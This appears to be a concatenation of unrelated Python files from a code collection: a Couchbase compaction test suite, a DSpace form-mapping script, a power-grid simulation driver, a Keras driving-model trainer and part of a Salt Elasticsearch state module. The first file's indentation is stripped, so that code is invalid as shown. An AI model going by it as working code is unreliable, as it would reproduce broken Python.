self._monitor_view_fragmentation()
rebalance_task = self.cluster.async_rebalance(self.servers[:self.nodes_init], servs_in, [])
for ddoc in self.ddocs:
compaction_tasks.append(self.cluster.async_monitor_compact_view(self.master, ddoc.name, with_rebalance=True, frag_value=self.fragmentation_value))
for task in compaction_tasks:
task.result()
rebalance_task.result()
self.verify_cluster_stats(self.servers[:self.nodes_in + 1])
def rebalance_in_with_ddoc_compaction(self):
self.disable_compaction()
self.make_ddocs(self.ddocs_num, self.view_per_ddoc)
self.create_ddocs()
self._load_all_buckets(self.master, self.gen_load, "create", 0)
servs_in = self.servers[self.nodes_init:self.nodes_in + 1]
self._monitor_view_fragmentation()
rebalance_task = self.cluster.async_rebalance(self.servers[:self.nodes_init], servs_in, [])
self.sleep(5)
for ddoc in self.ddocs:
result = self.cluster.compact_view(self.master, ddoc.name, with_rebalance=True)
self.assertTrue(result, "Compaction didn't finished correctly. Please check diags")
rebalance_task.result()
self.verify_cluster_stats(self.servers[:self.nodes_in + 1])
def rebalance_out_with_auto_ddoc_compaction(self):
rest = RestConnection(self.master)
self.log.info("create a cluster of all the available servers")
self.cluster.rebalance(self.servers[:self.num_servers],
self.servers[1:self.num_servers], [])
self.set_auto_compaction(rest, viewFragmntThresholdPercentage=self.fragmentation_value)
self.make_ddocs(self.ddocs_num, self.view_per_ddoc)
self.create_ddocs()
self._load_all_buckets(self.master, self.gen_load, "create", 0)
servs_out = [self.servers[self.num_servers - i - 1] for i in range(self.nodes_out)]
compaction_tasks = []
self._monitor_view_fragmentation()
rebalance_task = self.cluster.async_rebalance(self.servers[:self.nodes_init], [], servs_out)
for ddoc in self.ddocs:
compaction_tasks.append(self.cluster.async_monitor_compact_view(self.master, ddoc.name, with_rebalance=True, frag_value=self.fragmentation_value))
for task in compaction_tasks:
task.result()
rebalance_task.result()
self.verify_cluster_stats(self.servers[:self.num_servers - self.nodes_out])
def rebalance_out_with_ddoc_compaction(self):
self.log.info("create a cluster of all the available servers")
self.cluster.rebalance(self.servers[:self.num_servers],
self.servers[1:self.num_servers], [])
self.disable_compaction()
self.make_ddocs(self.ddocs_num, self.view_per_ddoc)
self.create_ddocs()
self._load_all_buckets(self.master, self.gen_load, "create", 0)
servs_out = [self.servers[self.num_servers - i - 1] for i in range(self.nodes_out)]
self._monitor_view_fragmentation()
rebalance_task = self.cluster.async_rebalance([self.master], [], servs_out)
self.sleep(5)
for ddoc in self.ddocs:
result = self.cluster.compact_view(self.master, ddoc.name, with_rebalance=True)
self.assertTrue(result, "Compaction didn't finished correctly. Please check diags")
rebalance_task.result()
self.verify_cluster_stats(self.servers[:self.num_servers - self.nodes_out])
def rebalance_in_out_with_auto_ddoc_compaction(self):
rest = RestConnection(self.master)
self.assertTrue(self.num_servers > self.nodes_in + self.nodes_out,
"ERROR: Not enough nodes to do rebalance in and out")
servs_init = self.servers[:self.nodes_init]
servs_in = [self.servers[i + self.nodes_init] for i in range(self.nodes_in)]
servs_out = [self.servers[self.nodes_init - i - 1] for i in range(self.nodes_out)]
result_nodes = set(servs_init + servs_in) - set(servs_out)
self.set_auto_compaction(rest, viewFragmntThresholdPercentage=self.fragmentation_value)
self.make_ddocs(self.ddocs_num, self.view_per_ddoc)
self.create_ddocs()
self._load_all_buckets(self.master, self.gen_load, "create", 0)
compaction_tasks = []
self._monitor_view_fragmentation()
rebalance_task = self.cluster.async_rebalance(servs_init, servs_in, servs_out)
for ddoc in self.ddocs:
compaction_tasks.append(self.cluster.async_monitor_compact_view(self.master, ddoc.name, with_rebalance=True, frag_value=self.fragmentation_value))
for task in compaction_tasks:
task.result()
rebalance_task.result()
self.verify_cluster_stats(result_nodes)
def rebalance_in_out_with_ddoc_compaction(self):
self.assertTrue(self.num_servers > self.nodes_in + self.nodes_out,
"ERROR: Not enough nodes to do rebalance in and out")
servs_init = self.servers[:self.nodes_init]
servs_in = [self.servers[i + self.nodes_init] for i in range(self.nodes_in)]
servs_out = [self.servers[self.nodes_init - i - 1] for i in range(self.nodes_out)]
result_nodes = set(servs_init + servs_in) - set(servs_out)
self.disable_compaction()
self.make_ddocs(self.ddocs_num, self.view_per_ddoc)
self.create_ddocs()
self._load_all_buckets(self.master, self.gen_load, "create", 0)
self._monitor_view_fragmentation()
rebalance_task = self.cluster.async_rebalance(servs_init, servs_in, servs_out)
self.sleep(5)
for ddoc in self.ddocs:
result = self.cluster.compact_view(self.master, ddoc.name, with_rebalance=True)
self.assertTrue(result, "Compaction didn't finished correctly. Please check diags")
rebalance_task.result()
self.verify_cluster_stats(result_nodes)
def test_views_time_compaction(self):
rest = RestConnection(self.master)
currTime = datetime.datetime.now()
fromTime = currTime + datetime.timedelta(hours=1)
toTime = currTime + datetime.timedelta(hours=12)
self.set_auto_compaction(rest, viewFragmntThresholdPercentage=self.fragmentation_value, allowedTimePeriodFromHour=fromTime.hour,
allowedTimePeriodFromMin=fromTime.minute, allowedTimePeriodToHour=toTime.hour, allowedTimePeriodToMin=toTime.minute,
allowedTimePeriodAbort="false")
self.make_ddocs(self.ddocs_num, self.view_per_ddoc)
self.create_ddocs()
self._load_all_buckets(self.master, self.gen_load, "create", 0)
self._monitor_view_fragmentation()
currTime = datetime.datetime.now()
#Need to make it configurable
newTime = currTime + datetime.timedelta(minutes=5)
self.set_auto_compaction(rest, viewFragmntThresholdPercentage=self.fragmentation_value, allowedTimePeriodFromHour=currTime.hour,
allowedTimePeriodFromMin=currTime.minute, allowedTimePeriodToHour=newTime.hour, allowedTimePeriodToMin=newTime.minute,
allowedTimePeriodAbort="false")
for ddoc in self.ddocs:
status, content = rest.set_view_info(self.default_bucket_name, ddoc.name)
curr_no_of_compactions = content["stats"]["compactions"]
self.log.info("Current number of compactions is {0}".format(curr_no_of_compactions))
compaction_tasks = []
for ddoc in self.ddocs:
compaction_tasks.append(self.cluster.async_monitor_compact_view(self.master, ddoc.name, frag_value=self.fragmentation_value))
for task in compaction_tasks:
task.result()
def load_DB_fragmentation(self):
monitor_fragm = self.cluster.async_monitor_db_fragmentation(self.master, self.fragmentation_value, self.default_bucket_name)
rest = RestConnection(self.master)
remote_client = RemoteMachineShellConnection(self.master)
end_time = time.time() + self.wait_timeout * 10
if end_time < time.time() and monitor_fragm.state != "FINISHED":
self.fail("Fragmentation level is not reached in {0} sec".format(self.wait_timeout * 10))
monitor_fragm.result()
try:
compact_run = remote_client.wait_till_compaction_end(rest, self.default_bucket_name,
timeout_in_seconds=(self.wait_timeout * 5))
self.assertTrue(compact_run, "Compaction didn't finished correctly. Please check diags")
except Exception, ex:
self.thread_crashed.set()
raise ex
finally:
if not self.thread_stopped.is_set():
self.thread_stopped.set()
def load_view_fragmentation(self):
query = {"stale" : "false", "full_set" : "true", "connection_timeout" : 60000}
end_time = time.time() + self.wait_timeout * 10
for ddoc in self.ddocs:
fragmentation_monitor = \
self.cluster.async_monitor_db_fragmentation(self.master, self.fragmentation_value, self.default_bucket_name, True)
while fragmentation_monitor.state != "FINISHED":
for view in ddoc.views:
self.cluster.query_view(self.master, ddoc.name, view.name, query)
if end_time < time.time() and fragmentation_monitor.state != "FINISHED":
self.fail("impossible to reach compaction value {0} after {1} sec".
format(self.fragmentation_value, (self.wait_timeout * 10)))
fragmentation_monitor.result()
try:
compaction_task = self.cluster.async_monitor_compact_view(self.master, ddoc.name, frag_value=self.fragmentation_value)
compaction_task.result(self.wait_timeout * 5)
except Exception, ex:
self.thread_crashed.set()
raise ex
finally:
if not self.thread_stopped.is_set():
self.thread_stopped.set()
def test_parallel_DB_views_compaction(self):
rest = RestConnection(self.master)
self.set_auto_compaction(rest, parallelDBAndVC="true", viewFragmntThresholdPercentage=self.fragmentation_value, dbFragmentThresholdPercentage=self.fragmentation_value)
self.make_ddocs(self.ddocs_num, self.view_per_ddoc)
self.create_ddocs()
self._load_all_buckets(self.master, self.gen_load, "create", 0)
RebalanceHelper.wait_for_persistence(self.master, self.default_bucket_name)
self._compaction_thread()
if self.thread_crashed.is_set():
self.fail("Error occurred during run")
def test_parallel_enable_views_compaction(self):
rest = RestConnection(self.master)
self.set_auto_compaction(rest, parallelDBAndVC="true", viewFragmntThresholdPercentage=self.fragmentation_value)
self.make_ddocs(self.ddocs_num, self.view_per_ddoc)
self.create_ddocs()
self._load_all_buckets(self.master, self.gen_load, "create", 0)
RebalanceHelper.wait_for_persistence(self.master, self.default_bucket_name)
self._compaction_thread()
if self.thread_crashed.is_set():
self.log.info("DB Compaction is not started as expected")
def test_parallel_enable_DB_compaction(self):
rest = RestConnection(self.master)
self.set_auto_compaction(rest, parallelDBAndVC="true", dbFragmentThresholdPercentage=self.fragmentation_value)
self.make_ddocs(self.ddocs_num, self.view_per_ddoc)
self.create_ddocs()
self._load_all_buckets(self.master, self.gen_load, "create", 0)
RebalanceHelper.wait_for_persistence(self.master, self.default_bucket_name)
self._compaction_thread()
if self.thread_crashed.is_set():
self.log.info("View Compaction is not started as expected")
def test_views_size_compaction(self):
percent_threshold = self.fragmentation_value * 1048576
rest = RestConnection(self.master)
self.set_auto_compaction(rest, viewFragmntThreshold=percent_threshold)
self.make_ddocs(self.ddocs_num, self.view_per_ddoc)
self.create_ddocs()
self._load_all_buckets(self.master, self.gen_load, "create", 0)
for ddoc in self.ddocs:
comp_rev, fragmentation = self._get_compaction_details(rest, self.default_bucket_name, ddoc.name)
self.log.info("Stats Compaction Rev and Fragmentation before Compaction is ({0}), ({1})".format(comp_rev, fragmentation))
fragmentation_monitor = self.cluster.async_monitor_disk_size_fragmentation(self.servers[0], percent_threshold, self.default_bucket_name, True)
while fragmentation_monitor.state != "FINISHED":
self._load_all_buckets(self.master, self.gen_load, "update", 0)
for view in ddoc.views:
self.cluster.query_view(self.master, ddoc.name, view.name, {})
fragmentation_monitor.result()
time.sleep(10)
new_comp_rev, fragmentation = self._get_compaction_details(rest, self.default_bucket_name, ddoc.name)
self.log.info("Stats Compaction Rev and Fragmentation After Compaction is ({0}) ({1})".format(new_comp_rev, fragmentation))
if new_comp_rev > comp_rev:
self.log.info("Compaction triggered successfully")
else:
try:
compaction_task = self.cluster.async_monitor_compact_view(self.master, ddoc.name, frag_value=percent_threshold)
compaction_task.result()
except Exception, ex:
self.fail(ex)
def _get_compaction_details(self, rest, bucket, design_doc_name):
total_fragmentation = 0
status, content = rest.set_view_info(bucket, design_doc_name)
curr_no_of_compactions = content["stats"]["compactions"]
total_disk_size = content['disk_size']
total_data_size = content['data_size']
if total_disk_size > 0 and total_data_size > 0:
total_fragmentation = \
(total_disk_size - total_data_size) / float(total_disk_size) * 100
return (curr_no_of_compactions, total_fragmentation)
def _monitor_view_fragmentation(self):
query = {"connectionTimeout" : "60000", "full_set" : "true", "stale" : "false"}
end_time = time.time() + self.wait_timeout * 30
for ddoc in self.ddocs:
fragmentation_monitor = self.cluster.async_monitor_db_fragmentation(self.master,
self.fragmentation_value, self.default_bucket_name, True)
while fragmentation_monitor.state != "FINISHED" and end_time > time.time():
self._load_all_buckets(self.master, self.gen_load, "update", 0)
for view in ddoc.views:
self.cluster.query_view(self.master, ddoc.name, view.name, query)
result = fragmentation_monitor.result()
self.assertTrue(result, "impossible to reach compaction value {0} after {1} sec".
format(self.fragmentation_value, (self.wait_timeout * 30)))
def _compaction_thread(self):
threads = []
threads.append(StoppableThread(target=self.load_view_fragmentation, name="view_Thread", args=()))
threads.append(StoppableThread(target=self.load_DB_fragmentation, name="DB_Thread", args=()))
for thread in threads:
thread.start()
while True:
if not threads:
break
else:
self._load_all_buckets(self.master, self.gen_load, "update", 0)
self.thread_stopped.wait(60)
threads = [d for d in threads if d.is_alive()]
self.log.info("Current amount of threads %s" % len(threads))
self.thread_stopped.clear()
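# Illustrative sketch added for exposition (not part of the original suite): the
# fragmentation percentage these tests wait for is simply the stale share of the
# on-disk view file, mirroring the arithmetic in _get_compaction_details above. The
# byte counts in the example are made up.
def _sketch_fragmentation(total_disk_size, total_data_size):
    if total_disk_size <= 0 or total_data_size <= 0:
        return 0
    return (total_disk_size - total_data_size) / float(total_disk_size) * 100
# e.g. _sketch_fragmentation(100 * 1048576, 20 * 1048576) == 80.0, which matches the
# default fragmentation_value used in setUp, so compaction would be triggered.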
|
py | b41525cd0eace9d7f108782ff33cf01e394aa66d | #!/usr/bin/python
# -*- coding: utf-8 -*-
'''
FUNASA project
Builds the input-forms.xml entries that map each collection to the submission form it should use.
Fabio Luis de Brito - 20191114
Usage:
python cria_handle_colecao_formulario.py
'''
import requests
URL_t="http://rcfunasa.bvsalud.org/rest/collections?offset=0&limit=1000"
# Run the query
r_t = requests.get(URL_t)
# Store the response content in 'data_t'
data_t = r_t.json()
for item in data_t:
name=item['name'].encode('utf-8')
handle=item['handle']
# Legislation - legi
if name=='Normativos':
texto=' <name-map collection-handle="' + handle + '" form-name="legi" />'
if name=='Políticas, Planejamento, Gestão e Projetos' or name == 'Produção Científica':
texto=' <name-map collection-handle="' + handle + '" form-name="pppp" />'
if name=='Produção Educacional':
texto=' <name-map collection-handle="' + handle + '" form-name="lom" />'
if name=='Produção Informacional e/ou Multimídia':
texto=' <name-map collection-handle="' + handle + '" form-name="multimedia" />'
print texto
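# Illustrative sketch added for exposition (not part of the original script): the
# printed <name-map/> lines are intended for DSpace's input-forms.xml, where they
# sit inside a <form-map> element. The helper below only wraps a list of such lines;
# writing the file and the rest of input-forms.xml are outside this script's scope.
def sketch_form_map(name_map_lines):
    return '<form-map>\n' + '\n'.join(name_map_lines) + '\n</form-map>'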
|
py | b4152633fa71db450785792df2473c319ec1194c | """Developement file that acts as main"""
"""VS may require default ironpython environment (no bit declaration)"""
import os
import subprocess
import signal
import __builtin__
# workaround for interactive mode runs (Use only if required)
print(os.getcwd())
os.chdir(r"C:\Users\heyth\source\repos\thadhaines\LTD_sim")
#os.chdir(r"D:\Users\jhaines\Source\Repos\thadhaines\LTD_sim")
#print(os.getcwd())
from parseDyd import *
from distPe import *
from combinedSwing import *
from findFunctions import *
from PerturbanceAgents import *
from pgov1Agent import *
from CoreAgents import AreaAgent, BusAgent, GeneratorAgent, SlackAgent, LoadAgent
from Model import Model
from makeModelDictionary import makeModelDictionary
from saveModelDictionary import saveModelDictionary
execfile('mergeDicts.py')
simNotes = """
20 MW load step at t=2
sim time = 20 seconds,
changed slackTol to 0.25. Timestep = 1
"""
# Simulation Parameters Dictionary
simParams = {
'timeStep': 1.0,
'endTime': 20.0,
'slackTol': .25,
'Hsys' : 0.0, # MW*sec of entire system, if !> 0.0, will be calculated in code
'Dsys' : 0.0, # PU; TODO: Incorporate into simulation (probably)
# Mathematical Options
'freqEffects' : 0, # w in swing equation will not be assumed 1 if this is true
'integrationMethod' : 'Euler',
# Data Export Parameters
'fileDirectory' : #r"\\verification\\noGovLoadStep\\loadStepDown\\", # relative path must exist before simulation
r"\\verification\\noGovLoadStep\\loadStepUp\\",
'fileName' : 'noGov',
'exportDict' : 1,
'exportMat': 1, # requies exportDict == 1 to work
}
# fast debug case switching
# TODO: enable new dyd replacement
test_case = 0
if test_case == 0:
savPath = r"C:\LTD\pslf_systems\eele554\ee554.sav"
dydPath = [r"C:\LTD\pslf_systems\eele554\ee554.exc.dyd",
#r"C:\LTD\pslf_systems\eele554\ee554.ltd.dyd",
]
elif test_case == 1:
savPath = r"C:\LTD\pslf_systems\MicroWECC_PSLF\microBusData.sav"
dydPath = [r"C:\LTD\pslf_systems\MicroWECC_PSLF\microDynamicsData_LTD.dyd"]
elif test_case == 2:
savPath = r"C:\LTD\pslf_systems\MiniPSLF_PST\dmini-v3c1_RJ7_working.sav"
dydPath = [r"C:\LTD\pslf_systems\MiniPSLF_PST\miniWECC_LTD.dyd"]
elif test_case == 3:
# Will no longer run due to parser errors
savPath = r"C:\LTD\pslf_systems\fullWecc\fullWecc.sav"
dydPath = [r"C:\LTD\pslf_systems\fullWecc\fullWecc.dyd"]
# Required Paths
locations = {
# full path to middleware dll
'fullMiddlewareFilePath': r"C:\Program Files (x86)\GE PSLF\PslfMiddleware" ,
# path to folder containing PSLF license
'pslfPath': r"C:\Program Files (x86)\GE PSLF",
'savPath' : savPath,
'dydPath': dydPath,
}
del savPath, dydPath
# these files will change after refactor, required after locations definition
execfile('initPSLF.py')
execfile('makeGlobals.py')
# mirror arguments: locations, simParams, debug flag
mir = Model(locations, simParams, 1)
# Perturbances configured for test case (eele)
# step up and down (pgov test)
#mir.addPert('Load',[3],'Step',['P',2,101]) # quick 1 MW step
#mir.addPert('Load',[3],'Step',['P',30,100]) # quick 1 MW step
# single steps up or down
#mir.addPert('Load',[3],'Step',['P',2,80]) # step load down to 80 MW
mir.addPert('Load',[3,'2'],'Step',['St',2,1]) # step 20 MW load bus on
mir.runSim()
mir.notes = simNotes
# Terminal display output for immediate results
print("Log and Step check of Load, Pacc, and sys f:")
print("Time\tSt\tPacc\tsys f\tdelta f\t\tSlackPe\tGen2Pe")
for x in range(mir.c_dp-1):
print("%d\t%d\t%.2f\t%.5f\t%.6f\t%.2f\t%.2f" % (
mir.r_t[x],
mir.Load[0].r_St[x],
mir.r_ss_Pacc[x],
mir.r_f[x],
mir.r_deltaF[x],
mir.Slack[0].r_Pe[x],
mir.Machines[1].r_Pe[x],))
print('End of simulation data.')
# Data export
if simParams['exportDict']:
# Change current working directory to data destination.
cwd = os.getcwd()
if simParams['fileDirectory'] :
os.chdir(cwd + simParams['fileDirectory'])
dictName = simParams['fileName']
D = makeModelDictionary(mir)
savedName = saveModelDictionary(D,dictName)
os.chdir(cwd)
if simParams['exportMat']:
# use cmd to run python 3 32 bit script...
cmd = "py -3-32 makeMat.py " + savedName +" " + dictName + " "+ simParams['fileDirectory']
matProc = subprocess.Popen(cmd)
matReturnCode = matProc.wait()
matProc.send_signal(signal.SIGTERM)
# attempt to delete .pkl file fails -> in use by another process, resolve?
#del matProc
#os.remove(savedName)
#print('%s Deleted.' % savedName)
# raw_input("Press <Enter> to Continue. . . . ") # Not always needed to hold open console |
py | b41526596dd806ff0166425831691b52bcb94ca1 | import sklearn
from sklearn.model_selection import train_test_split
from keras import Sequential, optimizers
from keras.callbacks import ModelCheckpoint
from keras.optimizers import Adam
from keras.layers import Flatten, Dense, Conv2D, Lambda, Cropping2D, Dropout, LeakyReLU
from random import shuffle, randint
import numpy as np
import cv2
import csv
import os
# Load data from a recording folder, e.g. '../DrivingData02/'
def loadData(path, changePathinCSV=False):
samples = []
if changePathinCSV:
with open(path + 'driving_log.csv') as csvfile:
reader = csv.reader(csvfile)
for line in reader:
# Rebase the recorded absolute image paths onto the dataset folder given by `path`
recorded_c = line[0]
recorded_l = line[1]
recorded_r = line[2]
filename = recorded_c.split('/')[-1]
filename_l = recorded_l.split('/')[-1]
filename_r = recorded_r.split('/')[-1]
line[0] = path + 'IMG/' + filename
line[1] = path + 'IMG/' + filename_l
line[2] = path + 'IMG/' + filename_r
samples.append(line)
else:
with open(path + 'driving_log.csv') as csvfile:
reader = csv.reader(csvfile)
for line in reader:
samples.append(line)
samples = sklearn.utils.shuffle(samples)
return samples
def randomDarkener(image):
alpha = 1
beta = randint(-30, 0)
res = cv2.addWeighted(image, alpha, np.zeros(
image.shape, image.dtype), 0, beta)
return res
def generator(samples, batch_size=32):
num_samples = len(samples)
while 1: # Loop forever so the generator never terminates
shuffle(samples)
for offset in range(0, num_samples, batch_size):
batch_samples = samples[offset:offset+batch_size]
images = []
angles = []
for batch_sample in batch_samples:
for i in range(3):
name = batch_sample[i].strip()
if os.path.isfile(name):
image = cv2.cvtColor(
cv2.imread(name), cv2.COLOR_BGR2RGB)
else:
print('Image listed in driving_log.csv is missing: {}'.format(name))
exit(1)
angle = float(batch_sample[3])
if i == 1:
angle += 0.20
if i == 2:
angle -= 0.20
images.append(image)
angles.append(angle)
if i == 0:
image_flipped = np.fliplr(image)
images.append(image_flipped)
measurement_flipped = -angle
angles.append(measurement_flipped)
if randint(0, 1000) % 30 == 0:
image = randomDarkener(image)
images.append(image)
angles.append(angle)
# trim image to only see section with road
X_train = np.array(images)
y_train = np.array(angles)
yield sklearn.utils.shuffle(X_train, y_train)
def CNN(train_samples, validation_samples, batch_size):
model = Sequential()
model.add(Lambda(lambda x: x / 255.0 - 0.5, input_shape=(160, 320, 3)))
model.add(Cropping2D(cropping=((60, 25), (0, 0))))
model.add(Conv2D(24, (5, 5), strides=(2, 2)))
model.add(LeakyReLU(alpha=.01))
model.add(Conv2D(36, (5, 5), strides=(2, 2)))
model.add(LeakyReLU(alpha=.01))
model.add(Conv2D(48, (5, 5), strides=(2, 2)))
model.add(LeakyReLU(alpha=.01))
model.add(Dropout(0.5))
model.add(Conv2D(64, (3, 3)))
model.add(LeakyReLU(alpha=.01))
model.add(Conv2D(64, (3, 3)))
model.add(LeakyReLU(alpha=.01))
model.add(Dropout(0.5))
model.add(Flatten())
model.add(Dropout(0.5))
model.add(Dense(100))
model.add(Dense(50))
model.add(Dense(10))
model.add(Dense(1))
model.summary()
return model
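# Illustrative sketch (not part of the original training script): steering inference
# on a single 160x320x3 RGB frame, assuming one of the saved model-XXX.h5 checkpoints
# has been loaded with keras.models.load_model. No extra preprocessing is needed
# because the model's own Lambda and Cropping2D layers normalize and crop the frame.
def predict_steering(model, rgb_frame):
    batch = np.expand_dims(rgb_frame, axis=0)  # add the batch dimension
    return float(model.predict(batch, batch_size=1))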
def main():
samples = []
# Loading Data from 3 different folders
# Each folder has different runs on simulator
samples += loadData('../DrivingData/')
samples += loadData('../DrivingData02/')
samples += loadData('data/')
print(len(samples))
# Spliting the data between trainnig (80%) and validation (20%)
train_samples, validation_samples = train_test_split(
samples, test_size=0.2)
# Setting the batch size
batch_size = 32
# Getting the model
model = CNN(train_samples, validation_samples, batch_size)
# Running the model, saving only the best models based on validation loss
checkpoint = ModelCheckpoint('model-{epoch:03d}.h5',
monitor='val_loss',
verbose=0,
save_best_only=True,
mode='auto')
model.compile(loss='mse', optimizer=Adam(lr=1.0e-4))
train_generator = generator(train_samples, batch_size=batch_size)
validation_generator = generator(validation_samples, batch_size=batch_size)
model.fit_generator(train_generator, steps_per_epoch=len(train_samples)/batch_size, validation_data=validation_generator,
validation_steps=len(validation_samples)/batch_size, epochs=30, callbacks=[checkpoint])
if __name__ == '__main__':
main()
|
py | b415266769ec4b8275ee64fc2713d922cc214dfe | # -*- coding: utf-8 -*-
'''
Manage Elasticsearch Domains
============================
.. versionadded:: 2016.11.0
Create and destroy Elasticsearch domains. Be aware that this interacts with Amazon's services,
and so may incur charges.
This module uses ``boto3``, which can be installed via package, or pip.
This module accepts explicit vpc credentials but can also utilize
IAM roles assigned to the instance through Instance Profiles. Dynamic
credentials are then automatically obtained from AWS API and no further
configuration is necessary. More information available `here
<http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/iam-roles-for-amazon-ec2.html>`_.
If IAM roles are not used you need to specify them either in a pillar file or
in the minion's config file:
.. code-block:: yaml
vpc.keyid: GKTADJGHEIQSXMKKRBJ08H
vpc.key: askdjghsdfjkghWupUjasdflkdfklgjsdfjajkghs
It's also possible to specify ``key``, ``keyid`` and ``region`` via a profile,
either passed in as a dict, or as a string to pull from pillars or minion
config:
.. code-block:: yaml
myprofile:
keyid: GKTADJGHEIQSXMKKRBJ08H
key: askdjghsdfjkghWupUjasdflkdfklgjsdfjajkghs
region: us-east-1
.. code-block:: yaml
Ensure domain exists:
boto_elasticsearch_domain.present:
- DomainName: mydomain
- profile: user-credentials
- ElasticsearchVersion: "2.3"
- ElasticsearchClusterConfig:
InstanceType": "t2.micro.elasticsearch"
InstanceCount: 1
DedicatedMasterEnabled: False
ZoneAwarenessEnabled: False
- EBSOptions:
EBSEnabled: True
VolumeType: "gp2"
VolumeSize: 10
Iops: 0
- AccessPolicies:
Version: "2012-10-17"
Statement:
- Effect: "Allow"
- Principal:
AWS: "*"
- Action:
- "es:*"
- Resource: "arn:aws:es:*:111111111111:domain/mydomain/*"
- Condition:
IpAddress:
"aws:SourceIp":
- "127.0.0.1"
- "127.0.0.2"
- SnapshotOptions:
AutomatedSnapshotStartHour: 0
- AdvancedOptions:
rest.action.multi.allow_explicit_index: "true"
- Tags:
a: "b"
- region: us-east-1
- keyid: GKTADJGHEIQSXMKKRBJ08H
- key: askdjghsdfjkghWupUjasdflkdfklgjsdfjajkghs
'''
# Import Python Libs
from __future__ import absolute_import
import logging
import os
import os.path
import json
# Import Salt Libs
import salt.ext.six as six
log = logging.getLogger(__name__)
def __virtual__():
'''
Only load if boto is available.
'''
return 'boto_elasticsearch_domain' if 'boto_elasticsearch_domain.exists' in __salt__ else False
def _compare_json(current, desired):
return __utils__['boto3.json_objs_equal'](current, desired)
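# Illustrative sketch added for exposition (not part of the original state module):
# the comparison above is delegated to __utils__['boto3.json_objs_equal'] so that
# key order and formatting differences do not register as configuration drift. A
# rough plain-Python stand-in (an assumption, not the real helper) would be:
def _json_objs_equal_sketch(left, right):
    return json.dumps(left, sort_keys=True) == json.dumps(right, sort_keys=True)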
def present(name, DomainName,
ElasticsearchClusterConfig=None,
EBSOptions=None,
AccessPolicies=None,
SnapshotOptions=None,
AdvancedOptions=None,
Tags=None,
region=None, key=None, keyid=None, profile=None,
ElasticsearchVersion="1.5"):
'''
Ensure domain exists.
name
The name of the state definition
DomainName
Name of the domain.
ElasticsearchClusterConfig
Configuration options for an Elasticsearch domain. Specifies the
instance type and number of instances in the domain cluster.
InstanceType (string) --
The instance type for an Elasticsearch cluster.
InstanceCount (integer) --
The number of instances in the specified domain cluster.
DedicatedMasterEnabled (boolean) --
A boolean value to indicate whether a dedicated master node is enabled.
See About Dedicated Master Nodes for more information.
ZoneAwarenessEnabled (boolean) --
A boolean value to indicate whether zone awareness is enabled. See About
Zone Awareness for more information.
DedicatedMasterType (string) --
The instance type for a dedicated master node.
DedicatedMasterCount (integer) --
Total number of dedicated master nodes, active and on standby, for the
cluster.
EBSOptions
Options to enable, disable and specify the type and size of EBS storage
volumes.
EBSEnabled (boolean) --
Specifies whether EBS-based storage is enabled.
VolumeType (string) --
Specifies the volume type for EBS-based storage.
VolumeSize (integer) --
Integer to specify the size of an EBS volume.
Iops (integer) --
Specifies the IOPS for a Provisioned IOPS EBS volume (SSD).
AccessPolicies
IAM access policy
SnapshotOptions
Option to set time, in UTC format, of the daily automated snapshot.
Default value is 0 hours.
AutomatedSnapshotStartHour (integer) --
Specifies the time, in UTC format, when the service takes a daily
automated snapshot of the specified Elasticsearch domain. Default value
is 0 hours.
AdvancedOptions
Option to allow references to indices in an HTTP request body. Must be
false when configuring access to individual sub-resources. By default,
the value is true.
region
Region to connect to.
key
Secret key to be used.
keyid
Access key to be used.
profile
A dict with region, key and keyid, or a pillar key (string) that
contains a dict with region, key and keyid.
ElasticsearchVersion
String of format X.Y to specify the version for the Elasticsearch domain, e.g.
"1.5" or "2.3".
'''
ret = {'name': DomainName,
'result': True,
'comment': '',
'changes': {}
}
if ElasticsearchClusterConfig is None:
ElasticsearchClusterConfig = {
'DedicatedMasterEnabled': False,
'InstanceCount': 1,
'InstanceType': 'm3.medium.elasticsearch',
'ZoneAwarenessEnabled': False
}
if EBSOptions is None:
EBSOptions = {
'EBSEnabled': False,
}
if SnapshotOptions is None:
SnapshotOptions = {
'AutomatedSnapshotStartHour': 0
}
if AdvancedOptions is None:
AdvancedOptions = {
'rest.action.multi.allow_explicit_index': 'true'
}
if Tags is None:
Tags = {}
if AccessPolicies is not None and isinstance(AccessPolicies, six.string_types):
try:
AccessPolicies = json.loads(AccessPolicies)
except ValueError as e:
ret['result'] = False
ret['comment'] = 'Failed to create domain: {0}.'.format(e.message)
return ret
r = __salt__['boto_elasticsearch_domain.exists'](DomainName=DomainName,
region=region, key=key, keyid=keyid, profile=profile)
if 'error' in r:
ret['result'] = False
ret['comment'] = 'Failed to create domain: {0}.'.format(r['error']['message'])
return ret
if not r.get('exists'):
if __opts__['test']:
ret['comment'] = 'Domain {0} is set to be created.'.format(DomainName)
ret['result'] = None
return ret
r = __salt__['boto_elasticsearch_domain.create'](DomainName=DomainName,
ElasticsearchClusterConfig=ElasticsearchClusterConfig,
EBSOptions=EBSOptions,
AccessPolicies=AccessPolicies,
SnapshotOptions=SnapshotOptions,
AdvancedOptions=AdvancedOptions,
ElasticsearchVersion=str(ElasticsearchVersion),
region=region, key=key,
keyid=keyid, profile=profile)
if not r.get('created'):
ret['result'] = False
ret['comment'] = 'Failed to create domain: {0}.'.format(r['error']['message'])
return ret
_describe = __salt__['boto_elasticsearch_domain.describe'](DomainName,
region=region, key=key, keyid=keyid, profile=profile)
ret['changes']['old'] = {'domain': None}
ret['changes']['new'] = _describe
ret['comment'] = 'Domain {0} created.'.format(DomainName)
return ret
ret['comment'] = os.linesep.join([ret['comment'], 'Domain {0} is present.'.format(DomainName)])
ret['changes'] = {}
# domain exists, ensure config matches
_status = __salt__['boto_elasticsearch_domain.status'](DomainName=DomainName,
region=region, key=key, keyid=keyid,
profile=profile)['domain']
if _status.get('ElasticsearchVersion') != str(ElasticsearchVersion):
ret['result'] = False
        ret['comment'] = ('Failed to update domain: version cannot be modified '
                          'from {0} to {1}.'.format(_status.get('ElasticsearchVersion'),
                                                    str(ElasticsearchVersion)))
return ret
_describe = __salt__['boto_elasticsearch_domain.describe'](DomainName=DomainName,
region=region, key=key, keyid=keyid,
profile=profile)['domain']
_describe['AccessPolicies'] = json.loads(_describe['AccessPolicies'])
# When EBSEnabled is false, describe returns extra values that can't be set
if not _describe.get('EBSOptions', {}).get('EBSEnabled'):
opts = _describe.get('EBSOptions', {})
opts.pop('VolumeSize', None)
opts.pop('VolumeType', None)
comm_args = {}
need_update = False
es_opts = {'ElasticsearchClusterConfig': ElasticsearchClusterConfig,
'EBSOptions': EBSOptions,
'AccessPolicies': AccessPolicies,
'SnapshotOptions': SnapshotOptions,
'AdvancedOptions': AdvancedOptions}
